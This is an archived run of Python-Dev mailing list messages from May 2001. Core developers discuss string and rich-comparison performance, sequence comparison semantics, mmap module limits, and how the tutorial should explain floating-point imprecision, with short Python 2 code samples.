From martin at loewis.home.cs.tu-berlin.de Sun May 20 15:48:43 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 20 May 2001 15:48:43 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> > string_compare() could special-case pointer equality too, although I suspect > doing so would be a net loss. I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without identity test takes 0.74s, running it with identity test takes 0.68s. Now, looking at the case of non-identical pointers, I could not find any measurable difference. After increasing the number of rounds by a factor of ten, I got, without identity test 6.920 6.920 6.910 6.970 7.080 6.920 6.920 6.910 6.930 6.920 With identity test, I got 6.930 6.930 6.920 7.080 6.920 6.930 6.960 6.930 6.920 6.920 That still does not look like a significant difference to me. Regards, Martin From guido at digicool.com Sun May 20 15:56:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 20 May 2001 09:56:54 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT." References: Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> > If the time machine batteries can hold a full charge, you may want to go back > and add Py_CMP as a seventh possible desired-operation argument to the rich > comparison API. Funny, I was thinking about this too last night. > My experience with dict comparisons was that dict_richcompare > couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full > cmp, so I put the dict oldcmp back in order to avoid having dict > richcmp (potentially) compute cmp 3 times to fake one cmp.
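Martin's script is Python 2: it uses `xrange`, the `print` statement, and `time.clock`, which was removed in Python 3.8. A rough Python 3 equivalent using the standard `timeit` module might look like the sketch below. `time_compare` is a hypothetical helper name, and absolute timings will vary by machine and interpreter version. Passing the same object twice exercises the identity case, while an equal but distinct string built at run time exercises the non-identical case.

```python
import timeit


def time_compare(a: str, b: str, number: int = 1_000_000, repeat: int = 5) -> float:
    """Best-of-`repeat` time in seconds for `number` evaluations of a < b."""
    timer = timeit.Timer("a < b", globals={"a": a, "b": b})
    # Taking the minimum of several runs is the usual way to damp timing noise.
    return min(timer.repeat(repeat=repeat, number=number))


if __name__ == "__main__":
    same = "ab"
    other = "".join(["a", "b"])  # equal value, but a different object
    assert same == other and same is not other
    print("identical objects: %.3f" % time_compare(same, same))
    print("equal, distinct:   %.3f" % time_compare(same, other))
```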
But if > dict richcmp knew a cmp outcome was desired, it could compute it > with no extra work to speak of. Then there would be no reason at > all to hold on to the dict tp_compare slot. I'm not sure I see the saving. There's no real saving in time, because you still have to make separate calls for EQ and CMP, right? There might be a saving in code, but you could solve that internally in dictobject.c by restructuring the code somewhat so that dict_compare shared more with dict_richcompare, right? It's mostly an API streamlining. The other difference between tp_compare and tp_richcompare is that the latter returns an object which makes testing for errors unambiguous. But (for several releases) we would still have to support tp_compare for b/w compatibility with old 3rd-party extensions. > The list and tuple richcmps are also doing almost all the work needed to > compute a 3-way cmp outcome. Ditto. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sun May 20 18:19:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 18:19:29 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07EE91.5747F4F4@lemburg.com> Tim Peters wrote: > > [MAL] > > How about making performance the main "feature" for 2.3 then ?! > > Guido may be a dictator, but he doesn't have a magic wand -- "the main > feature" is what people volunteer to do and then fight for and then actually > do. I will certainly go back to the basics and redo my optimization patches for Python later this year. Whether or not these will get included in the core is another story, but I have a need for a fast interpreter for my app. server and can't afford losing too much performance when moving from 1.5.x to 2.x. > > 2.0 - 2.2 introduced many new features in the interpreter core, > > so I think it's time to stabilize those features and focus on > > making Python regain the performance it had before those features > > were introduced.
At least to some of us, performance is an > > issue and I think that there's a lot we can do to improve it. > > "Performance" is meaningless unless quantified and made concrete: what is it > that runs too slowly? "Everything" is not a useful answer. Speeding up > line-at-a-time input was an example of something that worked, via focus and > measurement and pushing ahead despite opposition. I doubt any other approach > will bear fruit over such a short timeframe, and especially not without > resources to throw at it. Let's put it this way: if pystone gets a 50% boost, then all applications should benefit from it, regardless of whether they are function-call intensive or fiddle with a lot of attributes. Achieving that 50% will be a lot harder than for the 1.5 series, though ;-) > > One way to open up the field for better performance will be > > to modularize the interpreter, so that new ways of optimization > > can be explored, e.g. turning the VM into a register machine > > (Skip once started looking into this with his Rattlesnake > > patches) or creating specialized VMs which can then be used > > by optimizing compilers as targets. > > Restructure the core for the benefit of optimizing compilers that don't > exist? That sounds like an interesting research project, but not much to do > with making 2.3 faster. In the meantime, modularization is more likely to > make the VM that does exist slower. Depends on how you look at it: extension writers will then have the possibility of plugging in new compilers and VMs into Python to experiment with new optimization strategies. The Rattlesnake project is one such project which would do great with this plugin logic, since it uses special opcodes which an optimizer generates and then needs a modified VM to execute these new byte code streams...

import sys
from Rattlesnake import compiler, vm
sys.use_compiler(compiler)
sys.use_vm(vm)

This won't make stock Python 2.3 faster, but it would at least provide better means for experiments in that direction.
Alternative VM implementations like Stackless Python would also benefit from it. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sun May 20 23:13:04 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:13:04 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, on pointer-equality tests in string_compare()] > I've done some measurements here, too, again taking your example > ... > for i in indices: > "ab" < "ab" > ... > This is the case where testing for identity helps. Running it without > identity test takes 0.74s, running it with identity test takes 0.68s. This stuff all ties together. A pointer-equality test in string_compare() is guaranteed to lose every time string_compare() gets called from lookdict_string(). Let's lose string_compare() entirely (in favor of a self-contained-- apart from memcmp() --string_richcompare). From tim.one at home.com Sun May 20 23:37:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 17:37:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> Message-ID: [Tim, muses about a Py_CMP value for rich comparisons, and talks mostly about dict comps] > ... > I'm not sure I see the saving. There's no real saving in time, > because you still have to make separate calls for EQ and CMP, right? Right so far as it goes. A "fast path" (which currently doesn't exist but is clearly worth adding, based on both my and Martin's timings) for doing *all* kinds of same-type comparisons would only have to look for a richcompare slot, though, not one kind of slot in some cases and another in others. Uniformity is contagious . 
> There might be a saving in code, but you could solve that internally > in dictobject.c by restructuring the code somewhat so that > dict_compare shared more with dict_richcompare, right? Right, there would be no reduction in total code, and the dict routines already share as much as possible. In effect, the body of dict_compare would replace the last res = Py_NotImplemented; line in the (currently tiny) dict_richcompare guarded by the appropriate tests. > It's mostly an API streamlining. Bingo, and the possibility of retiring the tp_compare slot in P3K. > The other difference between tp_compare and tp_richcompare is that > the latter returns an object which makes testing for errors unambiguous. Also cool. > But (for several releases) we would still have to support tp_compare > for b/w compatibility with old 3rd-party extensions. Sure, although the way the CVS branch code is going it could be that 2.2 is the long-awaited utterly incompatible P3K anyway. >> The list and tuple richcmps are also doing almost all the work needed >> to compute a 3-way cmp outcome. > Ditto. Oh no! Those aren't like dict compares. A rich compare for sequence types (whether strings or lists) *has* to contain almost all the code necessary to implement cmp(), because just resolving Py_EQ in all cases has to find "the first" element (if any) that differs. Once that's known, you're at most one measly element compare away from producing the right cmp() outcome. This isn't true of dict compares: the algorithm for resolving dict Py_EQ/Py_NE when the dict sizes are the same doesn't do anything to help resolve general cmp(). Yes, a tp_compare slot could be re-added to lists and tuples, and implemented via refactoring their current tp_richcompare code into a common internal routine, but then we've just added another layer of function calls for all cases. I've timed C function calls, and it turns out they aren't actually free.
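Tim's point about sequences can be made concrete. In the Python 3 sketch below, `seq_compare` is a hypothetical helper and the op string `"cmp"` stands in for the proposed Py_CMP request. The shared work is the scan for the first differing element. After that, any of the six rich comparisons, or a 3-way result, is decided by one pair of values. The 3-way case costs two comparisons here only because Python 3 has no `cmp()`.

```python
import operator

RICH = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
        "!=": operator.ne, ">": operator.gt, ">=": operator.ge}


def seq_compare(a, b, op):
    """Compare sequences a and b; op is a key of RICH, or "cmp" for 3-way."""
    # Shared work for every op: find the first index where elements differ.
    n = min(len(a), len(b))
    i = 0
    while i < n and a[i] == b[i]:
        i += 1
    if i == n:
        # One sequence is a prefix of the other, so the lengths decide.
        x, y = len(a), len(b)
    else:
        # The outcome is decided by this single pair of elements.
        x, y = a[i], b[i]
    if op == "cmp":
        return (x > y) - (x < y)
    return RICH[op](x, y)
```

The results agree with Python's built-in list and tuple comparisons, for example `seq_compare([1, 2], [1, 2, 3], "<")` is `True`.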
From tim.one at home.com Mon May 21 09:53:24 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 03:53:24 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I would like to break this down by defining the mapping between cmp() > and rich comparisons. Good idea! > I propose: > > - If cmp() is requested but not defined, and rich comparisons are > defined, try ==, <, > in order; if all three yield false, act as if > rich comparisons were not defined, and use the fallback comparison > (i.e. by address). Here and below you didn't cover the case where cmp() is requested and is defined. I believe it's agreed now (but wasn't yet at the time you wrote this) that cmp() will be called in that case (which requires changes to the current implementation). > - If a rich comparison is requested but not defined, use cmp() and use > the obvious mapping. Cool, except this is missing what I believe was an intended detail, like that when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be tried before falling back to cmp(). Also note this today:

class C:
    def __lt__(x, y):
        print "in __lt__"
        return NotImplemented
    def __gt__(x, y):
        print "in __gt__"
        return NotImplemented

C() < C()

That prints

in __lt__
in __gt__
in __gt__
in __lt__

I don't know how to explain why each method gets called twice (well, I do, but it's hard to swallow). Again this can have semantic consequences, e.g. if the methods have side-effects; and it's unclear whether this is intended, a bug, or implementation-defined. > - Continue to define the comparison of unequal sequences in terms of > cmp(). "the comparison" is ambiguous there: you mean all comparisons? just cmp() comparisons? just rich comparisons? In any case, also unclear what "in terms of cmp()" means: that every pair of corresponding elements must be compared via cmp()? Or that only the first non-Py_EQ pair must be compared via cmp()?
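Guido's first two rules lend themselves to a short Python rendering. This is a sketch of the proposal as worded in the thread, not of what any Python release actually implemented (Python 3 dropped `cmp()` altogether). `cmp_via_rich` and `rich_via_cmp` are hypothetical names, and comparing `id()` values stands in for the "by address" fallback.

```python
import operator

_RICH = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
         "!=": operator.ne, ">": operator.gt, ">=": operator.ge}


def cmp_via_rich(x, y) -> int:
    """Rule 1: derive cmp() by trying ==, <, > in that order.

    x and y are assumed to support ==, < and > (Python 3 raises
    TypeError for < and > on types that define no ordering).
    """
    if x == y:
        return 0
    if x < y:
        return -1
    if x > y:
        return 1
    # All three were false: fall back to an arbitrary but consistent order.
    return (id(x) > id(y)) - (id(x) < id(y))


def rich_via_cmp(cmp_result: int, op: str) -> bool:
    """Rule 2: the 'obvious mapping' from a 3-way result to a rich comparison."""
    return _RICH[op](cmp_result, 0)
```

A NaN is a handy test of the fallback, since it answers false to all three of `==`, `<` and `>`.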
Pseudo-code would be much clearer than English here. > - Testing == or != for sequences takes these shortcuts: Must take these shortcuts, or may take these shortcuts? > 1. if the lengths differ, the sequences differ Note that I removed the tuple_richcompare code for doing this, because I never found a case where tuples were compared via Py_EQ/Py_NE and the lengths differed. So the length-check in this case was a waste of time. It isn't true of lists or strings that it's a waste of time, but I believe there are strong reasons for why programs simply will not compare different-sized tuples for equality. I would not like to pay for tuple length checks if only one case in 500 billion would benefit, but if #1 is a mandatory shortcut there's no choice. > 2. compare the elements using == until a false return is found Currently the sequence rich-compare code does #2 for all 6 comparison operators. Is that wrong? Looked reasonable to me! > Note that this defines 'x!=y' as 'not x==y' for sequences. We could > easily go the extra mile and define != to use only != on the items; > but is this worth the extra complexity? Not at all: tuples and lists are Python's sequence types, so Python is entitled to define what comparison means for them in any way it likes. We've already got cases where (see the first msg in this thread) [x] cmpop [y] may yield a different result than x cmpop y so we've already punted on doing the best-possible job of mimicking whatever crazy-ass comparisons user-defined objects implement, when those objects are contained in Python sequences. My bias is showing : I want Python's builtin sequence types to be as efficient as possible. Nasty example: two conformable (same rank and dimensions) NumPy matrices A and B return a conformable matrix of 0/1 bits when compared via "<" (well, maybe they actually don't, but that's what drove richcmps to begin with!). 
It may well be *convenient* for them if (A1, A2, A3) < (B1, B2, B3) always returned a list (or tuple) of 3 0/1 matrices too: [A1 < B1, A2 < B2, A3 < B3] So builtin sequence comparisons can't be all things to all people regardless. From Barrett at stsci.edu Mon May 21 14:17:09 2001 From: Barrett at stsci.edu (Paul Barrett) Date: Mon, 21 May 2001 08:17:09 -0400 Subject: [Python-Dev] mmap module References: Message-ID: <3B090745.5D70353E@STScI.Edu> Tim Peters wrote: > > [Paul Barrett] > > In the CVS log of the mmapmodule.c, Tim Peters says: > > > > "The code really needs to be rethought from scratch (not by me, though > > ...)." > > That was in specific reference to the code I changed, in mmap_find_method. > The difficulty is that mmap is great for "large files", but the code before > my change used a C int for the starting offset and also for the return > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 > bytes). The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform > capabilities out of reach for large files (e.g., "even Win95" *allows* > specifying 64-bit offsets when creating a mapped file view). C is a > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() > don't cater to the full range of C integral types anyway. In other words, > if this code is ever to reach its full potential, it "really needs to be > rethought from scratch". OK, thanks for the clarification. > > The ability to have offsets into a file that are not multiples of the > > system pagesize would also be nice. > > It's OS-specific. Python should grow warts to protect against it on the > OSes that care. Well, hopefully the OS-differences wouldn't prevent implementing a more abstract interface. > > I'd be willing to submit a PEP on a new mmapmodule, once I know what > > others would like. 
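The non-pagesize offsets Paul asks for can be emulated on top of a mapping whose offset is legal. Round the requested offset down to the allocation granularity, map a little extra, and skip the slack. The sketch below targets today's Python 3 `mmap` module, whose `offset` argument must be a multiple of `mmap.ALLOCATIONGRANULARITY`. `read_region` is a hypothetical helper, and it copies the bytes out instead of returning a view into the mapping.

```python
import mmap


def read_region(f, offset: int, size: int) -> bytes:
    """Return `size` bytes starting at an arbitrary byte `offset` of file f.

    f must be a real file object with a fileno(), and the requested region
    must lie inside the file.
    """
    gran = mmap.ALLOCATIONGRANULARITY
    aligned = (offset // gran) * gran  # round down to a legal mmap offset
    slack = offset - aligned           # bytes to skip at the start of the map
    with mmap.mmap(f.fileno(), slack + size, offset=aligned,
                   access=mmap.ACCESS_READ) as m:
        return m[slack:slack + size]
```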
> > Hard to say. This has the potential to become Python's next thread > subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If > you do write a PEP, I vote to say that we'll cover Windows and Linux (and > maybe Mac OS X?) out of the box, but any other platform is at your own risk > (it doesn't really help if somebody pops up volunteering to support a > minority platform, because they eventually go away, their code stops > working, and it never gets fixed -- so it's use-at-your-own-risk in reality > regardless). Yes, I agree. Windows, Unix/Linux, and Mac OS X should be the supported platforms. My intention is not to make major changes to the Python interface, but to fix bugs and to implement some additional features, such as a non-pagesize file offset. I'll try to get something written up in the near future. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From martin at loewis.home.cs.tu-berlin.de Mon May 21 18:44:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 18:44:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de> > This stuff all ties together. A pointer-equality test in string_compare() is > guaranteed to lose every time string_compare() gets called from > lookdict_string(). Let's lose string_compare() entirely (in favor of a > self-contained-- apart from memcmp() --string_richcompare). Ok. I've now updated my patch on SF to remove string_compare, inline everything into string_richcompare, add _PyString_Eq, and use that in lookdict_string. Who would want to review and approve/reject this patch? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 21 19:03:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. 
Loewis) Date: Mon, 21 May 2001 19:03:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> > Note that the usual way to write this is > > if (c < 0 && PyErr_Occurred()) > > More work for my artificial "ab" < "cd" case but a net win in real life (when > c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, > when c < 0 there's no way in the cmp protocol to use c's value alone to > distinguish between "less than" and "error"). Ok. I've updated my tp_compare patch on SF to do so; it also un-deprecates UserList.__cmp__. > > Here, I get 3 function calls: f is string_compare, then > > PyErr_Occurred, finally convert_3way_to_object, which converts > > {-1,0,1} x Op -> {Py_True, Py_False}. > > Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. Any reason why PyThreadState_GET isn't used there? > There's no danger of over-indexing when ob_size==0, because it doesn't > include the trailing null byte Python always sticks at the end of string > objects; and the first-byte check is much more likely to pay off than the > zero-length check (comparison to a null string? gotta be rare as clear > conclusions ), and better to test for the more common case first. This is now also in the string_richcompare patch on SF. Regards, Martin From tim.one at home.com Mon May 21 20:29:02 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 21 May 2001 14:29:02 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com> Message-ID: [Fred checkin] > > *************** > > *** 2610,2617 **** > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200*200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.4, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... 
p = [x, y] > > --- 2610,2617 ---- > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200 * 200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.400000000000002, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] [Guido] > Hmm... The tutorial now contains at least one example of floating > point imprecision. Does it also contain text to explain this? (I'm > sure Tim would be happy to provide some if there isn't any. :-) [Fred] > It contains others, and I don't think there's an explanation. Some > text from Tim to explain this would be greatly appreciated! Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: so long as we rely on the platform C to format floats, the output isn't well-defined (the last digit or so can and will vary across boxes). I can certainly explain that this is so, and even why, but unsure the tutorial is the right place for it. In any case the tutorial shouldn't be giving examples whose output is platform-dependent. For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour the tutorial for all such cases? Or we could put the attached function at the start of the tutorial and use it to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that.

def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)

From guido at digicool.com Mon May 21 21:02:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 15:02:43 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT." References: Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com> > Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: > so long as we rely on the platform C to format floats, the output isn't > well-defined (the last digit or so can and will vary across boxes). I can't check right now, but I thought that this was pretty consistent across some common platforms?
In any case the tutorial > shouldn't be giving examples whose output is platform-dependent. > For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour > the tutorial for all such cases? Are you serious? This is something that the newbie who is in the least bit adventurous will run into anyway, so I don't think that not talking about this at all in the tutorial is fair or helpful. That just perpetuates the questions from newbies about "floating point is broken" -- since none of the tutorial examples prepare them for this. Since this is behavior that is ordinarily observed and perpetually perplexing, I think it *must* be treated in the tutorial. The tutorial doesn't have to have the full explanation -- maybe it's enough to say something like ``due to round-off errors you will sometimes see inexact results like 31.400000000000002; don't worry about this, you can use str() or "%g" (but not round()!) to strip redundant precision, and here's a URL for more info.'' Or maybe the full story can be an appendix. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:09:04 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:09:04 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net> Guido van Rossum wrote: > > Or maybe the full story can be an appendix. Or maybe Decimal should go in the standard distribution? What kind of deadline do I have for finishing that to go into 2.2? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine.
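Tim's advice to prefer 10 * 3.25 over 10 * 3.14, and Guido's idea of using "%g" to hide the extra digits, can both be checked in a few lines. The sketch below assumes a modern Python 3 interpreter, not the Python 2.1 discussed in this thread; Python 3's float repr and formatting differ from 2.1's. The helper name `exactly_equals` is hypothetical. The sketch uses the standard `fractions.Fraction` to test whether a float holds a decimal value exactly, and `decimal.Decimal`, which converts a float without rounding, to display the same exact expansion that Tim's f2ds computes.

```python
from decimal import Decimal
from fractions import Fraction


def exactly_equals(x: float, literal: str) -> bool:
    """Hypothetical helper: True if the binary double x is exactly the
    decimal number written in `literal`, with no rounding at all."""
    return Fraction(x) == Fraction(literal)


for x, literal in [(10 * 3.14, "31.4"), (10 * 3.25, "32.5")]:
    # repr() shows enough digits to round-trip; "%g" keeps 6 significant digits.
    print(repr(x), "%g" % x, exactly_equals(x, literal))

# Decimal(float) is an exact conversion, so it prints every digit of the
# stored binary value, much as f2ds(10 * 3.14) does.
print(Decimal(10 * 3.14))
```

With IEEE-754 doubles, the loop prints `31.400000000000002 31.4 False` and then `32.5 32.5 True`. The value 3.25 is 13/4, a binary fraction, so the product is exact. That is why it makes a portable tutorial example.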
From guido at digicool.com Mon May 21 22:35:10 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:35:10 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT." <20010521200904.05CAE99C81@waltz.rahul.net> References: <20010521200904.05CAE99C81@waltz.rahul.net> Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com> > > Or maybe the full story can be an appendix. > > Or maybe Decimal should go in the standard distribution? What kind of > deadline do I have for finishing that to go into 2.2? Adding Decimal to the distribution is fine. But using it by default for floating point literals and other floating point results is a different story. The PEP about that hasn't really been discussed enough to make a decision, but a conservative estimate is that this change won't be made in 2.2. So Decimal doesn't solve the problem the tutorial has. --Guido van Rossum (home page: http://www.python.org/~guido/) From aahz at rahul.net Mon May 21 22:42:15 2001 From: aahz at rahul.net (Aahz Maruch) Date: Mon, 21 May 2001 13:42:15 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM Message-ID: <20010521204215.F216699C81@waltz.rahul.net> Guido van Rossum wrote: > >>> Or maybe the full story can be an appendix. >> >> Or maybe Decimal should go in the standard distribution? What kind of >> deadline do I have for finishing that to go into 2.2? > > Adding Decimal to the distribution is fine. But using it by default > for floating point literals and other floating point results is a > different story. The PEP about that hasn't really been discussed > enough to make a decision, but a conservative estimate is that this > change won't be made in 2.2. So Decimal doesn't solve the problem the > tutorial has. 
Wasn't thinking of going quite that far, only changing the tutorial to say something like, "If you want speed, use the hardware FP (which is directly supported by Python's floating literals); if you want accuracy, use Decimal." (Or FixedPoint, which is already in the distribution.) The full story needn't go in the Appendix; we can simply refer people to Cowlishaw and Kahan. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From guido at digicool.com Mon May 21 22:57:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 16:57:08 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT." <20010521204215.F216699C81@waltz.rahul.net> References: <20010521204215.F216699C81@waltz.rahul.net> Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com> [Aahz] > >>> Or maybe the full story can be an appendix. > >> > >> Or maybe Decimal should go in the standard distribution? What kind of > >> deadline do I have for finishing that to go into 2.2? [Guido] > > Adding Decimal to the distribution is fine. But using it by default > > for floating point literals and other floating point results is a > > different story. The PEP about that hasn't really been discussed > > enough to make a decision, but a conservative estimate is that this > > change won't be made in 2.2. So Decimal doesn't solve the problem the > > tutorial has. [Aahz] > Wasn't thinking of going quite that far, only changing the tutorial to > say something like, "If you want speed, use the hardware FP (which is > directly supported by Python's floating literals); if you want accuracy, > use Decimal." (Or FixedPoint, which is already in the distribution.) 
> The full story needn't go in the Appendix; we can simply refer people to > Cowlishaw and Kahan. I think that most people don't care about either speed or accuracy, but (being Python users) everybody cares about convenience, and convenience is using the built-in floating point literals. (Also, most other modules returning or using floating point numbers use binary floating point, e.g. the time module and of course the math module.) As long as the built-in literals are binary floating point, they are what 99% of the code uses, so we need to explain the pitfalls. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at cj42289-a.reston1.va.home.com Mon May 21 23:47:35 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Mon, 21 May 2001 17:47:35 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental updates to the Python 2.2 documentation. From tim at digicool.com Mon May 21 23:57:22 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 17:57:22 -0400 Subject: [Python-Dev] FP vs. tutorial Message-ID: Let's get some errors cleared up first:
+ FixedPoint is not in the distribution.
+ There is no PEP for Decimal.
+ Decimal f.p. is not more accurate than binary f.p. In fact, it's provably worse (but not by much).
For the rest,
+ Yes, I'm serious about not including tutorial examples with platform-dependent output, unless they're explicitly meant to illustrate non-portable code.
+ Specific small examples notwithstanding, there is no uniformity across platforms in the last digit or so, because not even the IEEE-754 standard requires that (while C is much sloppier than 754), and vendors generally don't implement anything better than the minimum necessary when it comes to f.p. (Sun is a notable exception).
+ Happy to add text explaining the existence of surprises, and providing a URL. Do the floating-point morons on Python-Dev find this one comprehensible?: http://www.lahey.com/float.htm From guido at digicool.com Tue May 22 00:33:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 18:33:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT." References: Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com> > + Yes, I'm serious about not including tutorial examples with > platform-dependent output, unless they're explicitly meant to > illustrate non-portable code. Sure. Most examples can be rewritten to avoid platform-dependent output. But there should be one section on floating-point inaccuracies that shows a few of the kind of things you can expect on a typical platform, and 1.1 -> 1.1000000000000001 is pretty common. > + Specific small examples notwithstanding, there is no uniformity > across platforms in the last digit or so, because not even the IEEE-754 > standard requires that (while C is much sloppier than 754), and > vendors generally don't implement anything better than the minimum > necessary when it comes to f.p. (Sun is a notable exception). So we'll have to add something like "the actual inexact output you see may differ from the inexact output in this example". > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I was thinking more of immortalizing this one: http://www.python.org/cgi-bin/moinmoin/RepresentationError This can serve as a nice self-contained section on f.p. surprises. 